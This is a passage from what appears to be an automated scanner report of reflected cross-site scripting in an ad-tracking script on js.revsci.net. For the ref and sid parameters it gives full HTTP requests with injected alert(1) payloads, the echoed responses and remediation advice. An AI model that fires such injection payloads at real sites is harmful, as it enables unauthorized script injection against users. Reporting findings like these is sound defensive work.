rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','432');
A10868.DM_addEncToLoc('vid', '6127792');
A10868.DM_addEncToLoc('pid', '456378');
A10868.DM_addEncToLoc('pli', '21203059781e';alert(1)//9000e16a98');
A10868.DM_addEncToLoc('sid', '1887835');
A10868.DM_addEncToLoc('ali', '3130307');
A10868.DM_addEncToLoc('cid', '9518378');
A10868.DM_addEncToLoc('p', '275');
A10868.DM_addEncToLoc('ref', 'http://
...[SNIP]...

1.312. http://js.revsci.net/gateway/gw.js [ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0f0a'%3balert(1)//f6f691022ad was submitted in the ref parameter. This input was echoed as d0f0a';alert(1)//f6f691022ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=432&vid=6127792&pid=456378&pli=2120305&sid=1887835&ali=3130307&cid=9518378&p=275&ref=http%3A//d.tradex.openx.com/afr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Did0f0a'%3balert(1)//f6f691022ad& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_POOa="MLsXtSHtJzpvJ5G+ytKgurD8xZbguKBAUoXMlOhbDZEIyUnXvCY/f7eEYgF17PuoYfq5CEudAjRL1GbcO/7J60JGGit5YpjkTi94QZ++NpMovzSXDH2egifUZfAGA4x6DJ1ef7CxdWNM1Ath6aEIxixI6X+ZFnchP7su1AfMVdmbt4uXOwFbARuez9yGUILljsr8iZpbE0YOpDX/I8dVzRiqWCbJWrig0+Ygf+aONwJLVAG9Qci4qyJ0OEoyF/C9WVXIsdxjo58DG+M5Z24kOQTzZzl9WL1fBtLwQMgZBQn3zjpdo1exh0bsmOsoJq0J12qVAbFThsQz5IDt7CkQiyleF6OSs84OYdv+QMiLgpV9FRrdszNyJ1Z1zdWSL2eBUsGyJ9LgmSypFoj2IJYq+CYjKuJh1q5SotTKfyoRjtQMIlYaw1bYORoY2KsywkRFoyeuXaDHr+kubAEaiR4mv+ueQqOTBqIL8EaJVKNeK14CvyaGEGiOf4xVidLPtWVp2cvmx+x8USaJltoPt52X7Qo3G9b5gMMSX/O7j4QHvGs068mYD7Jt0w3zVBoiChmjJijUOZI7pBIcB7pcDyhPXu0ekU8FNf+EZ2maUs/pJNfuLWhxzdwV8IFJvoDuP/k2F1fAFaKV5m3tJu4Kbsthsmobn+AEKG1fmaDEW/Rl9s4FMKHX6d1NaUg1aGoUNW9vlSNUkNQyg5xbyIqlIG60UCqagEd7akjIlHqEKgyVPmZRXCZsks8KUgS+ggIDyN3nm8Q9ybV7DYPDsaMVL9l30qTRehQMpViyu4aazqatyngUryJYSDMAw3MoxCYvzLg4VI0yQpDT4YM7EL/sjZF3GBKEvexarBUJ8IhXSEgBy8YPlIb7J1fU36Xok+aMd7hKisl1fiJ5L9WWlvPngVsNahS23h2ilcpGbvT7P8I1H67JHJs0T5zOxlbKA0tgt1XwzumjmY1MFQG7npmmjsejndnQNq6/1ECJ9acOs9TLs4eapvNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSsNSRS6PEPs+B0Hn8vC43OULFX/VMEqBD7Um7K4PkKLzZ45EK/e7fMS47h1FG+y0pSm42Y6HkNkhnxCrDjBcgROJzznpsuIbJZQHyXl8j4cUgGiZBxqQSPqhFr9mtghL4GOwp2YKJAlwRxM+bjbCTXIMg2izcge98/uLVSVc1qMa6m03veDkqyKsoaPFeEkA2OOgtvIAoNV11Moc2Q+7bMZeZl4CDzl94tevQyhvCzcZDWHw1CA4qMQBfMOZr4xEG93vu+i9zYjr9xG1HA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW2FJxi65P63qhCJt0YP0gMlFmQMsihPn4MV2v59cKlKSELXAgqbss7TVL5/B0TuuGU260dpfoFfufumXLCpyIlXH1DRvhprlFYuymPmKAKQrrAUgRzvmuXaEHlH5jRUx1uEFjhqo7hOpqY+eQR+el8zb4xYyA0B3Fjnz5zUZGXZEUOHOUu5GVkR50a/qnzLWhgVLpMsIBeAsDZwR2196JkcyvgVxTSCglY6cvfSw1V+yzCTCmcXLsyRIBE5QZz41zi2x/Bw=="; rsi_us_1000000="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"; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rtc_k8KG=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; rsi_segs_1000000=pUP94zmhOXMMH/C1v6FY5BD9CU6duy7ESpLgzGDKYyViGwmWW18bAQsYoAM+8HjFdJtFJWRCiLHBLDbWsPcI86yrtpktmfFacilUsrkfIWWKJiDdQnsDK82st/RBdHlSiCArToI74iBMHEIM6aRZ+ctyPyV2AcskZoa93bnD+7KzmMsYNaQWBrrYkNUezvQnLXGkhVG05Odz4K2YkQ7efGHGdJsOKQEkcQBYjtqaS6H7ZlDNGWHeUbBT+7iWjqkltSlqdFkY5ZCSD/LpMe6oE2LhWxsHk9CQb4f/4DBRvVR+Vsn3Wa2otHHl9DcyWQkxt+HNZk80xAqzN7umu7qJn1io7bu4IlqZWRAwUL/2riYdQyqUN2xVKYYypoVq1rD+CHWBoax0NCsrkHXbllfg48mnErvVtscNhDauRsHqShGST1ntuJP8Y2uTzuL21JyFn9D8BzYJI7XWgqgHY3hwgF1X4Spu79NlxqFyDqacIxYDmgj/c/80HbjalDyO2MjzVEQUdlANyAYn0j8EbYmxQKxsM6Rx3taFnmBYEmerFK8BfqeoKPoaXWO+nwv0ryXCZUva1SDjlo2wVhjQ76dAQ1KhNRC+7n6erq2kuZ1UHS7gGJ+a8IPLnbMauEqtWz/vfr9PAbndBB364psLhQxsNBZ/V+G5/rjrxQ6XCrYppz+AmSwLTlzgnXYOZE+rGQrANefuO3zqAEj7Orx7bW+c7SVq/vKvEfxbwhQK4Bb0D6+TT7bmiEPzBBOMjJtdSmdMA/UlA/1ADQ==; udm_0=MLv3NyEJZjpr3xSpL/sKOUxICxpURCNKVG8JBfsMOWr4c1ruOor8IW57ubLruJ70uAvWzxrBuHPGjOV0Yl999w9PWZEwp6XsRgcj+GkbCgPiYv9OYis//qNYlXaQsRkv1/9n8rbpls3/lg3b/9yLcovhjH8xhVus+bOGmVMfi7o7gawXwNvz26uIS28JGVLlC25P0hSiX8y1K25Ud7EXnL8DDb8pkUWpjvKZpMzKbPpZV94WqnSr172thZ8syzScr9cZG9oqnzD7bqSMJL5BQKcgxSuou8ECw+GXnkdl4OmbY2FbSYlCDRgc+/c6lhFH7jE0YNiubrzPt27J/JEc0Gs+XkI+Ebd1WvYw9/Xd7ftCSDR0Zwe8AhR6iKptca2vjFNTTKo+OkkLJW2FIsLYkAONGVJ9hOmW5e084U7uw0vM+Lhdzw9TqVu5ygVCjUYWXFmCqrrrRk62v1d6cSVtIHFIJ4lePrRIuyqlN2ALWcWNJ2nVPNQCtG6Dh8DEERFi+XoP1wPFhC0GiF7wn0MHND/wCWXx/JWKUU+VC34cUxuUta3r3XuTvx4d+vBQXuDPDnw29QIFptXZW6fOOuymtApEj21aZsv0egu11Apu04LD/roZjbpAC6QGunZcYL9ssZpQjWQYMBZlGqIfgh3iuuWUsPHTBGUDt5cscdNfS7TKpmHXmthcbc/d7e+/MnAdrT/1ZehbDdCHZQeWj6mIfzSpZ8cC3Zk24ZglqRgwNFbilMuOn3DcO2ugB4zdEQcmVaaz6YHh+JNmmLMjl2TA24PK3xD+fbpmhzFvEBjIi7clvv9qOiJtouwDDd2RQYT2Ep3F/HnCv/GaCR4wdJNb6Izjx2OU4EC6SMnmhzRJZx1Mvbeyktq11Zi2w55ZWgZls7Q7wzCg65f8+2GBHdPcBi0xQFO8j756qtOn/3dAStKIMF35glzGEz2NyJbHKXBtkH2X19gpB6ax9rOyGogvW99/utdnqqUGrzn/kEpQnDa2kEUk811wVSbL6q60O/bbCiUNeKz3rRkQPFP8+aD6V0zGLjDPKncsy1hNjN1jRpSMXKxDqVRdpcYwttiPkWREhaInub+YWVtT1oXubfLiNHV9UJeD2k0fkb7r3mvCCEYCbYbJQQbyzKSxCaY/3lu5/BahDewpho2bntF1PV9ZAIHz13i3/QIFqKunfGZergISuHHcpD6S5AkX5oSnOVAymhcRYncJuDVR7w3F5RLVa7EHGecTDqlEvm59ZX8cTQ5bzJ1Abtx13XYb7j1u7zVIfeXneYS+0GlZAi3yogjdpiPiBw1EH7P9o/q1Zg7W9IkgH/YVzge06UUUK4rT1AoMaf8i7WK1YW21srH7XQ0Ot8fltujTte/8QbNhYbI7IG0rOSBbSov47vv3n6MjpPrAf5qhMAXLUGatxFcl4tsfOkACgIvhTn8I6rAXvEYYlNAxsCfXmnI0p8hQiJERchlgDMgmxns4Ly+e/p6PMLWHzPtN5c+q+g+IPQG377uaac8DJzK02AriShlM9dZKDYxgqlG+zJ24k7ffFdBB4+ibuSXB8ld6ZqZ1O9+R2LgBbwAuSwdkT4ftgIBysXBOapY6pYD+cT84SMwsgTEMDgtYrO7hiyO4Q+hxJwlkbjJNzvJXX1Y8JfAsyg8ZWg53ml7FrAz2kysF0CgU8P9ILnou5Ckc6kCRS2UU0ZoeR188Jg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMNZjhn3tNDUOlBGTE3eSEqwyvr9wMJ4Exz8Q2ofcULnb1SSDTb0/zLtj8aWkEex6sURtMmeAwzK2UwXhLDhdV953CLMWjUVA3lXGUkDMPKe5WwzPG2tdVbCI7YKARX91AE8BVH3535U6jLgv2boj7KEmrT2TktMt26KLdc2Kss4QNPi+caKUK8opkodf0TWbaJuOf5DYT8hUo2P+Dm+x77+eP/jGgiLFo+s+N4bMPcRFpwjgc/40i5hZa2z5yL/in0LdvfZPTdD0ZJx5kvSztD62NoeK851n7IRIisZmGsejhtgVdlA61Js/b6zIQ81MFQFsYhlfJo2AeGtlEHyjlJ8JWv6I+lcCY/LFG5JIUeuiCip/tGswX/hEEOOVb0s6OvrqLRdnzCzPdsoGyX1cidy7KhJPJAzPyLjq4x2LfRMaVE+/zkxtjssT0UAXq/eQbyg5qcGJums7apOwZQJelhciddBHziW1UMDv7XIGB4PUgaEnYHctiAReH4V0wf9sqekn27uxqFnD5X4BhrFCsDytNX8IPxa5meI0u/yDKQ+4nrHpVSDBWTt4yuHjARWammkT7/9YGK8cX+mcHwICUONTnaZXiuwPrMaMG1lUAUSiFyP1AXTU31Y8buVxjS+enyh2XWZxpA1WjY2tl0N9d3QMvsuVtiyGoVli91LVVhVJxqTT7tkBgii25NwMFQFqXX0uvUo/fcwPMGH96OqYrJ6qfReCDqqT+bK42dEZP5L3irGJdo6ajhlgVK3WmuzOTNSb7jbar3S66GHre1Vg2gJkUU3hfWGTeLKIJkBktAZwp0BZc/9OHeKCpszpNEwseUvmQn5zQmPc2w71rL46meNOZ31vbOgDM4yDGTkdfyEf8om9i7BuwvOAB3hcVd1ZfL750yo7ze5CG/m3HQPJTfS9J/tqTBDFy4odE9HPyACoiZxy98DFVTXeLE4jvUquHKi9e3LPVVOZpAeO/Ej0R8Rd2nAusRKnfPanrds0yG3qWYwzU4HHkGm8GJsIrNMszzW6yA0sqmyYnLpI96YemjNvDmhog47HFpOxTP/HIMAl+eY6y9gs9jgbkc81hERBPARkvT1yTGyhCp5/iq6OSHrMgEIXjByw1ljzufYa5NWgvPVY3y+tlsP+TVdCqCgJYNFzxHQDLxMdtzhx7CHT9w5Igk4ajmlo9U4HXKgzOv2fZFWiCP6HYTvK8qDi2bi4jWrZIFAnIzUaXB3g/YUsHIYyqNTKYIRnZ7FIPLTkYBps4sGIv4ctuCs+vtEmCzIlnocF3TE4fixJ9RpAom61XLL5oCbP7TDa0HrPG+qC4waUvS6PBH3SsleOchtQQUtR7eoEmaWxIMXI6NTLwqsj7Q4LRmge5sMOhw9Shq0acDrmBSVyPdBv/+sobZ4jELKCrCFQMAKw3m+jVIyjdH5j/Ns9zguGg2tfnJCkXKes4egB4tA/9GQ1wJn2vCgVtjkPwK4VvGPBXtRaZoxq/fToAB4TkaSkdb9G74wiv2uP2xGvLBXZgOalhl8EHcy3XtfaeyfREwhk/LLpsiB+tcu+GyLwRD9fCaypappSd5HM3+YvauO4wg1boCF8tupjB8fGdoN3X4jyqmP19N6gD+muvc4KKHHIIECQ1x3miprT1h8hrv5WgBcAzajmkK1SMi9jvgE2T2cG01MecmroPiLQ5Icn730jN0LuV+amd+UuuTQOUV4yrAs95MdzKnKeE0MF90W1zFrCh6lLHdUFMrTm3NV6tZ9yO6N9Bpro2OvAIxYwQSJBqbVnmhqT3D2tL0GZyia9d2xTH2+kUrSZFfQeTlVcfmFgXGOsh26NsLiA0o/J+ozpmooekqkKDFvKBSu6T5WfDeZLyMv24=; Domain=.revsci.net; Expires=Wed, 27-Jun-2012 03:01:02 GMT; Path=/
Last-Modified: Tue, 28 Jun 2011 03:01:02 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 28 Jun 2011 04:01:02 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 28 Jun 2011 03:01:01 GMT
Content-Length: 6236

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
_addEncToLoc('ali', '3130307');
A10868.DM_addEncToLoc('cid', '9518378');
A10868.DM_addEncToLoc('p', '275');
A10868.DM_addEncToLoc('ref', 'http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=id0f0a';alert(1)//f6f691022ad');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChild);}
function asi_makeIFrame(u,h,w){var e=document.createElement
...[SNIP]...

1.313. http://js.revsci.net/gateway/gw.js [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e237'%3balert(1)//45284dc1750 was submitted in the sid parameter. This input was echoed as 1e237';alert(1)//45284dc1750 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=432&vid=6127792&pid=456378&pli=2120305&sid=18878351e237'%3balert(1)//45284dc1750&ali=3130307&cid=9518378&p=275&ref=http%3A//d.tradex.openx.com/afr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Di& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; 